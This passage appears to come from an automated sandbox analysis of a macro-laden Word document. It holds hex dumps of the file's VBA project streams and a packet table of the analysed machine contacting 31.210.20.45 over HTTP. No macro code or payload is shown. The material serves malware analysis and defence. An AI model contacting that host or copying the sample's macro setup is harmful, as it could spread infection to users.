Data Raw:	49 44 3d 22 7b 35 44 36 35 46 34 33 44 2d 32 37 30 41 2d 34 38 33 42 2d 38 46 41 34 2d 43 42 36 44 44 33 46 35 42 44 36 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 65

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	65
Entropy:	3.27802992751
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2592

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	2592
Entropy:	4.11036825962
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
Data Raw:	cc 61 a6 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 562

General
Stream Path:	Macros/VBA/dir
File Type:	data
Stream Size:	562
Entropy:	6.329417886
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . Y . . b . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . X . m . .
Data Raw:	01 2e b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 59 e9 b6 62 0b 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Stream Path: WordDocument, File Type: data, Stream Size: 4096

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	4096
Entropy:	1.04528425699
Base64 Encoded:	False
Data ASCII:	. . . . Y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j [ . [ . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . . \\ 9 . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	ec a5 c1 00 59 e0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 62 6a 62 6a 5b c9 5b c9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 39 a3 0a 5c 39 a3 0a 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 11, 2021 07:41:48.519517899 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.571166992 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.571353912 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.573122978 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.625103951 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.669747114 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.725075006 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.725127935 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.725167990 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.725207090 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.725215912 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.725250959 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.775830030 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.775949001 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.776024103 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.776035070 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.776088953 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.776143074 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.776206017 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.776279926 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.776340961 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.776391983 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.776457071 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.776510000 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.826922894 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.826953888 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.826972961 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.826992035 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.827016115 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.827045918 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.827079058 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.827105999 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.827137947 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.827161074 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.827186108 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.827208042 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.827225924 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.827231884 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.827245951 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.827250004 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.827266932 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.827286959 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.827296019 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.827307940 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.827328920 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.827368021 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.827418089 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.878262043 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878289938 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878305912 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878321886 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878336906 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878353119 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878369093 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878386021 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878407001 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878418922 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.878423929 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878442049 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878459930 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878470898 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.878477097 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878493071 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878503084 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.878509045 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878537893 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.878561974 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878562927 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.878603935 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878617048 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.878643990 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878706932 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.878736973 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878753901 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878803968 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878813028 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.878870010 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878894091 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878916025 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878930092 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.878940105 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878964901 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878988028 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.879009008 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.879019022 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.879031897 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.879053116 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.879071951 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.879086971 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.879096985 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.879125118 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.879167080 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.879220963 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.929886103 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.929951906 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.929989100 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930022955 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930056095 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930078983 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.930089951 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930102110 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.930121899 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930157900 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930191040 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930188894 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.930233002 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930237055 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.930273056 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930293083 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.930306911 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930344105 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930371046 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.930380106 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930423021 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930440903 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.930460930 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930495977 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930510998 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.930538893 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930574894 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930592060 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.930608034 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930640936 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930658102 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.930675030 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930707932 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930728912 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.930742979 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930778027 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930794001 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.930830002 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930866003 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930886030 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.930900097 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930941105 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930953979 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.930979013 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.931010962 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.931034088 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.931046009 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.931081057 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.931097031 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.931133986 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.931194067 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.931211948 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.931230068 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.931263924 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.931288958 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.931303978 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.931340933 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.931360006 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.931375027 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.931407928 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.931430101 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.931442022 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.931476116 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.931494951 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.931509972 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.931540966 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.931569099 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.931582928 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.931618929 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.931641102 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.931653023 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.931704998 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.964029074 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.983498096 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.983560085 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.983602047 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.983639002 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.983642101 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.983681917 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.983699083 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.983721018 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.983769894 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.983769894 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.983814955 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.983880997 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.015662909 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.015728951 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.015768051 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.015818119 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.015865088 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.015897036 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.015902996 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.015944004 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.015944004 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.015966892 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.015989065 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.016027927 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.016043901 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.016067982 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.016108036 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.016155958 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.016158104 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.016200066 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.016212940 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.016241074 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.016280890 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.016321898 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.016334057 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.016360998 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.016379118 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.016401052 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.016442060 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.016490936 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.016491890 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.016535044 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.016573906 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.016582012 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.016613960 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.016652107 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.016665936 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.016690969 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.016704082 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.016730070 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.016778946 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.016827106 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.016840935 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.016871929 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.016885996 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.016911983 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.016952038 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.016989946 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.017004013 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.017029047 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.017040014 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.017067909 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.017107010 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.017153978 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.017159939 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.017198086 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.017201900 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.017236948 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.017276049 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.017314911 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.017333031 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.017369986 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.034544945 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.034616947 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.034657955 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.034702063 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.034703970 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.034742117 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.034790993 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.034796000 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.034836054 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.034843922 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.034879923 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.034969091 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.067843914 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.067960024 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.068057060 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.068068027 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.068136930 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.068195105 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.068203926 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.068269968 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.068332911 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.068396091 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.068396091 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.068449974 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.068466902 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.068538904 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.068602085 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.068656921 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.068662882 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.068716049 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:49.068727970 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.068793058 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:49.068854094 CEST	80	49728	31.210.20.45	192.168.2.3
